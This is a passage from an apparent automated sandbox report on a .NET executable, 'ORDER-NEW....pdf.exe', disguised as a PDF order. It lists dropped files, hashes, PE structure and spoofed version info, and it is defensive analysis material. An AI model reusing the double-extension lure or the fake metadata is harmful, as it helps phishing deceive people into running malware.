                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      01:10:17API Interceptor1x Sleep call for process: AppLaunch.exe modified
                                                                                                                                                                      01:10:33API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      No context

                                                                                                                                                                      Domains

                                                                                                                                                                      No context

                                                                                                                                                                      ASNs

                                                                                                                                                                      No context

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ORDER-NEW....pdf_70cd51994b2ca6c43fdadda6aa6cd8c7578681_53edd7b4_19425bcf\Report.wer

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.0293440585745517
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:hIP8dyokHBUZMXCaK2+BKS/u7saS274ItIS:KsXsBUZMXCas//u7saX4ItIS
                                                                                                                                                                      MD5:B7607C5A67D60518DD35306885D2D5F0
                                                                                                                                                                      SHA1:89EB5329FC6F3C7990C4846F82064AE67D6340D9
                                                                                                                                                                      SHA-256:CD4381937B8E65768C8E6B01E37A2B0342A6279D64DC233E172D131FA21D5321
                                                                                                                                                                      SHA-512:6E57D47BD17B5E456F75ECB0C89FC47E78C35E3FDACFEA3959E84511C2CD41EE455EDB463580834E2D4780268668D0EC82B320B58137C2B98C85357980BC7BD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.7.1.9.7.4.2.7.6.9.1.3.3.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.7.1.9.7.4.3.2.3.0.0.6.8.1.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.d.4.6.c.f.c.-.4.4.f.f.-.4.6.4.d.-.a.1.b.a.-.5.5.8.3.6.e.d.b.9.3.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.4.5.f.9.a.5.-.a.c.f.7.-.4.8.d.9.-.a.4.7.c.-.6.7.f.9.c.0.d.2.7.2.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.R.D.E.R.-.N.E.W.........p.d.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.R.D.E.R.-.N.E.W...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.c.c.-.0.0.0.1.-.0.0.1.b.-.9.1.5.f.-.2.1.3.c.5.b.0.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.c.7.2.9.6.f.2.5.3.e.f.4.2.8.2.0.5.6.5.1.e.4.6.3.5.1.d.2.6.9.0.0.0.0.0.0.0.0.!.0.0.0.0.4.7.2.9.7.1.7.d.a.b.3.d.d.0.1.b.2.c.a.5.9.1.c.8.6.a.0.2.1.

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER450B.tmp.dmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Fri Jan 21 00:10:28 2022, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):226070
                                                                                                                                                                      Entropy (8bit):3.6927076008180193
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:oUIB/Wr59gIOgF5P3d0kvS01jd+p7TUCgU5:oUB59RpDfd0J5pvTj
                                                                                                                                                                      MD5:AC7E17B4571E2921F7CEE372AECA7C2E
                                                                                                                                                                      SHA1:FB54FEF3DFA45217D659CAC8A065BAD67CF36A45
                                                                                                                                                                      SHA-256:8579D5A99A271FB4796EA56B2F41DC4196DBAAF7907B31C87AD4F8975FC19900
                                                                                                                                                                      SHA-512:1A3482D03D8B55781B60A334E785744C00F11093E5B7178EAB8DBED063D2D261ADDED3FD44513AA40559AD5609D83EA1D00A3A1D631C9881A2F6D5994245CB21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:MDMP....... ..........a............$...............,........#...9..........T.......8...........T............-...E...........................................................................................U...........B......8 ......GenuineIntelW...........T..............a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D78.tmp.WERInternalMetadata.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8440
                                                                                                                                                                      Entropy (8bit):3.7116856008780728
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNisr6u6YrGSUZwYgmfZ+OYSDz+prRP89bAesfzWAm:RrlsNiI6u6Y6SUZwYgmfcOYSowAdf8
                                                                                                                                                                      MD5:F8D33B020A04B76623B3DF988494C771
                                                                                                                                                                      SHA1:6107B8B4A98C023A040E2D478E91EE386538B1ED
                                                                                                                                                                      SHA-256:E72F166B7499D474C87536715569CAE42A28E0A3ECEC8D50E510652C368CB78F
                                                                                                                                                                      SHA-512:CEFE2816013CC0D050C857853DF0DF4D3D6D845C5DBD5BDDD705753BCA43901537F9F48860FA68228BC8924EB86D4A8EF6806A025D6B94FF5C0F59ADA5D35209
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.6.0.<./.P.i.d.>.......

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F9C.tmp.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4788
                                                                                                                                                                      Entropy (8bit):4.554814536874402
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cvIwSD8zsFJgtWI9JVWSC8Bt8fm8M4JJ6E8FTp+q8vvEnnsd2OuOsd:uITffakSNUJJ6zKvI42OuOsd
                                                                                                                                                                      MD5:4BB86D387161A85F5B749B606B4D345E
                                                                                                                                                                      SHA1:DF32A0D54392C434920109868AABD723A2083FA1
                                                                                                                                                                      SHA-256:3B698B082DCDCDBA264AE8B0288D006F2E75740EB9B1178262FACDAEB6848370
                                                                                                                                                                      SHA-512:E01B21EE40F054CBDD14053BB79F421D19AB24D8F72BA68605308454DA78F2C7E52838D55BCB6908475EFE2CE23073C9E20A15648F4D292ED18A055108085030
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1351281" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\7e8a2afc-e75b-3dcf-f7ef-7d8629ca2b45

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):88
                                                                                                                                                                      Entropy (8bit):5.498871107126153
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:PFYyImXF9mNwkR/BhgnGgu8oMiOxn:PH1Gl5Qx
                                                                                                                                                                      MD5:537ED8DF56D73F21A755994D1C93FFC2
                                                                                                                                                                      SHA1:28962F1FDAECDA158CDCCBAE4BCCD8B8E3DB3226
                                                                                                                                                                      SHA-256:394D4FC05A58E0679261425BEB08D6D4454CDE7B7F7125BDFF71F2DFC89EC02C
                                                                                                                                                                      SHA-512:5CB00F9B5201141447ED4C7CAB3973A01A429C023CC470851144D035752530CF99B57FA86A0CDE1C97275B35A2DCA6375A489C4D77552FD8B11A789C40E9288A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:LeNF7Goy7uuKWKsmWAhDmhEi2BbZGy27JQQaO8wc/LiTgVXryptsvCdDD6azBwPsBF7YpxYLPiV+1+f4iDYK9A==

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bhvF129.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x74a33dcf, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29884416
                                                                                                                                                                      Entropy (8bit):1.082255052623099
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:GDmPet8HVmy49w781tfXy7R4aUpPX7Cr6f63rsLOZ:Sm4y4JrO
                                                                                                                                                                      MD5:A7B64D8170665009A33F856D18628AEA
                                                                                                                                                                      SHA1:8891BA0D467C97814FCD77D67A78A67E9CD914F6
                                                                                                                                                                      SHA-256:62312B3DE715982ECBBD2BD9741124112E95EB301CF523BF0F55B1565D75B0AA
                                                                                                                                                                      SHA-512:DB716213E115225254F05923C8C5B566CEA41502CAF327DC78A8C6A27B83494DC157DC547E5D280927F9DBB392D0594AD0765244379321C02545C2281A491119
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:t.=.... ........?......_e..*....w......................^.8...../....z../....z..h.:.........................b...*....w..............................................................................................{............B.................................................................................................................. .......9....z......................................................................................................................................................................................................................................[4.......z..................J........z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpB254.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..

                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1572864
                                                                                                                                                                      Entropy (8bit):4.239826107855132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:AiwUr9bffhQ4HzTwWt9fw/3Gt+MEPAmSMYm0VAQUVpm++ywV:5wUr9bffhQEzTwyZt
                                                                                                                                                                      MD5:FC0ECF3DFFC95B0D0B66F85A5377B38F
                                                                                                                                                                      SHA1:5E0A6E3E964D4F7366F91C5C3426DE40C2334345
                                                                                                                                                                      SHA-256:E18926AD872FB94F16F2235C5B9FB4446B15148B2104E88457E5DCC86E47EF14
                                                                                                                                                                      SHA-512:E3A3A6136C2FA684B5E3FE5361D997F52B5562201AEE0939BECB8BECC0212C5953954DB8D9CCA0F5D16B989C095DCD9E429B5199CFEA8A8E0087434837C62EB5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...K[...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24576
                                                                                                                                                                      Entropy (8bit):3.5793505518149167
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:G/EA52JOomTv+Xyb5R5YPv41gnVVeeDzej1NKZtjbT8G/wmAtWA7jm:6f2JONT2Xi5Rtg/eeDze5NYtj0G/wmb2
                                                                                                                                                                      MD5:61F6E0001723DE42C363948B8832922B
                                                                                                                                                                      SHA1:A8AAF1D133EDBD05B3B64F2A487D486E47C92DE5
                                                                                                                                                                      SHA-256:DC60F4D015083ECA2C0C5EA9135C1860B6DC0CD9B59581F8B07DD6B5ED85CCC6
                                                                                                                                                                      SHA-512:389E8A77497189B8AD2DE15DA2B9A4EDB59BBA436154E85936EF50A2E9D0A37C8386ADF773508FB1287DECA3BB55AB977CAE3796470608B2CBDBC68035C001C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...K[...................................................................................................................................................................................................................................................................................................................................................HvLE.^......G...........!.\6....v.................................. ..hbin................p.\..,..........nk,..A.K[................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..A.K[....... ........................... .......Z.......................Root........lf......Root....nk ..A.K[................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Entropy (8bit):7.984856690873441
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                      File name:ORDER-NEW....pdf.exe
                                                                                                                                                                      File size:782848
                                                                                                                                                                      MD5:1baec657210438b896934a7a793c204c
                                                                                                                                                                      SHA1:4729717dab3dd01b2ca591c86a02176386e02356
                                                                                                                                                                      SHA256:b041030454ea89a3ff2326405d3bf230f53daa9ecd50c3e3882a1ad6c0d2427c
                                                                                                                                                                      SHA512:bdd388f9a1825bb9d21b8871535fc997751255ad2cf00dae12713e2a62aef4471b2d59d35430d45fc606ada32ce89b52f835623194a2d268006af43d093a8b4c
                                                                                                                                                                      SSDEEP:12288:PLpBX5M15aBnwpO06AKyCIy7OX4CzuEXU2x0V9CfArXVUVUU7I5e:DpBpGpOUKPW4CzuEkqw9CfvVUt5
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-O.....................8.......`...`... ....@.. ....................................@................................

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x4c600a
                                                                                                                                                                      Entrypoint Section:
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                      Time Stamp:0x4F2DFFA8 [Sun Feb 5 04:03:52 2012 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:4
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      jmp dword ptr [004C6000h]
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb640c0x4f.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x668.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc60000x8
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0xb60000x48.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      )xrUhX0x20000xb2d4c0xb2e00False1.00031528433data7.99978046274IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .text0xb60000xb2980xb400False0.723328993056data6.66811735085IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0xc20000x6680x800False0.35205078125data3.64270697756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0xc40000xc0x200False0.044921875data0.09262353601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      0xc60000x100x200False0.044921875data0.142635768149IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                      RT_VERSION0xc20a00x3d8data
                                                                                                                                                                      RT_MANIFEST0xc24780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                                      Version Infos

                                                                                                                                                                      DescriptionData
                                                                                                                                                                      Translation0x0000 0x04b0
                                                                                                                                                                      LegalCopyrightCopyright 2018 Park Place Entertainment Corp
                                                                                                                                                                      Assembly Version0.0.0.0
                                                                                                                                                                      InternalNameORDER-NEW.exe
                                                                                                                                                                      FileVersion10.7.31.1
                                                                                                                                                                      CompanyNamePark Place Entertainment Corp
                                                                                                                                                                      Commentsutogogesisisakisikucic
                                                                                                                                                                      ProductNameDirectory Listing handler
                                                                                                                                                                      ProductVersion10.7.31.1
                                                                                                                                                                      FileDescriptionDirectory Listing handler
                                                                                                                                                                      OriginalFilenameORDER-NEW.exe

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      No network behavior found

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:01:10:02
